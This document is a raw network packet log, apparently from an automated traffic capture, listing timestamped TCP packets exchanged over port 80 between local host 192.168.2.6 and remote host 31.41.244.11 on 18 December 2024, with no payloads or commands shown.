                                                                                                                                                                  Dec 18, 2024 11:09:25.858325958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.858372927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.858397961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.858442068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.860773087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.860858917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.860917091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.863360882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.863430977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.863471031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.863514900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.865895987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.865942001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.866014004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.866059065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.868426085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.868478060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.868514061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.868556976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.870901108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.870953083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.871058941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.871098995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.873306990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.873363018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.873434067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.873478889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.875755072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.875802994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.875924110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.875968933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.878190994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.878242016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.878283978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.878331900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.880387068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.880438089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.880508900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.880544901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.882711887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.882738113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.882771015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.882796049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.885021925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.885072947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.885144949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.885190964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.887221098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.887274027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.887330055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.887375116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.889478922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.889525890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.889610052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.889652014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.891774893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.891834021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.891879082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.893987894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.894155979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.894217014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.896229029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.896301985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.896363020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.896408081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.898478985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.898549080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.898606062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.898638964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.900721073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.900779009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.900793076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.900820971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.902965069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.903136015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.903158903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.903202057 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.905213118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.905277014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.905328989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.905364990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.907483101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.907618046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.907670021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.909868002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.909907103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.909928083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.909943104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.913131952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.913192987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.913325071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.913372040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.916249990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.916261911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.916301012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.917488098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.917547941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.917587996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.918979883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.919044018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.919083118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.920943022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.920984983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.921035051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.921071053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.923240900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.923300028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.923351049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.925443888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.925493956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.925590038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.925668955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.927673101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.927812099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.927858114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.929943085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.930154085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.930201054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.932210922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.932291985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.932478905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.932532072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.934422016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.934561014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.934608936 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.936680079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.936724901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.936810970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.936919928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.938966990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.939013004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.939049006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.939089060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.941179037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.941302061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.941344976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.943466902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.943515062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.943553925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.943676949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.945673943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.945764065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.945810080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.947901964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.948035002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.948090076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.948138952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.950134039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.950329065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.950376987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.952400923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.952450991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.952505112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.952544928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.955440044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.955456018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.955502987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.956944942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.956969023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.957012892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.959178925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.959228039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.959264040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.959304094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.961395025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.961442947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.961476088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.961524010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.963614941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.963664055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.963704109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.964009047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.965867043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.965913057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.965925932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.965964079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.968094110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.968137980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:25.968174934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:25.968219042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.039798021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.039875031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.039932966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.039978027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.040713072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.040761948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.040874958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.040916920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.042392969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.042438984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.042464018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.042509079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.044188023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.044233084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.044454098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.044502020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.045989990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.046032906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.046077967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.046116114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.047720909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.047768116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.047827005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.047868013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.049566031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.049577951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.049613953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.051160097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.051212072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.051250935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.051292896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.052949905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.052994013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.053076982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.053116083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.054611921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.054656029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.054739952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.054781914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.056305885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.056351900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.056351900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.056391001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.057818890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.057874918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.057936907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.057976961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.059447050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.059492111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.059528112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.059571981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.061045885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.061105013 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.061214924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.061259031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.062613010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.062658072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.062710047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.062752962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.064173937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.064218044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.064287901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.064323902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.065726042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.065781116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.065859079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.065901041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.067285061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.067327976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.067387104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.067429066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.068809032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.068851948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.068892002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.068933010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.070333958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.070379019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.070446014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.070488930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.071858883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.071897984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.071965933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.072007895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.073379040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.073421001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.073456049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.073498964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.074809074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.074852943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.074899912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.074944019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.076349020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.076394081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.076402903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.076442003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.077761889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.077807903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.077855110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.077897072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.079189062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.079233885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.079296112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.079334021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.080684900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.080728054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.080799103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.080841064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.082118988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.082164049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.082278013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.082320929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.083528996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.083583117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.083607912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.083650112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.084974051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.085014105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.085076094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.085119009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.086384058 CET804991231.41.244.11192.168.2.6
